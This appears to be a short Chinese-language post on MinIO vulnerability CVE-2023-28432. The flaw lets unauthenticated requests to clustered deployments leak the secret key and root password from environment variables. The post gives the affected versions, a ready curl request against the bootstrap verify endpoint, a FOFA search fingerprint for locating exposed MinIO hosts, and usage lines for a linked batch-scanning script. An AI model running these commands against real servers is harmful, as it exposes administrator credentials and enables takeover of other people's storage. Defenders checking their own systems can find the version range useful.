概述
MinIO 是一种开源对象存储服务,与 Amazon S3 API 兼容,可用于私有云或公共云。MinIO是一种高性能、高可用的分布式存储系统,可以存储大量数据,并提供高速的数据读写能力。MinIO采用分布式架构,可以在多个节点上运行,实现数据的分布式存储和处理。
在集群部署的Minio中,未授权的攻击者可发送恶意的HTTP请求来获取Minio环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录Minio。
影响范围
漏洞利用的前提是使用分布式部署
RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z
poc
简单检测
curl -XPOST http://172.16.16.128:9001/minio/bootstrap/v1/verify
http://IP:9000/minio/bootstrap/v1/verify
批量检测(url.txt里边必须加协议)
https://github.com/MzzdToT/CVE-2023-28432
Fofa指纹
app="minio"
python3 minio.py -u http://127.0.0.1:1111 单个url测试
python3 minio.py -f url.txt 批量检测 (url.txt里边必须加协议)
扫描结束后会在当前目录生成存在漏洞url的vuln.txt
exp.png
网友评论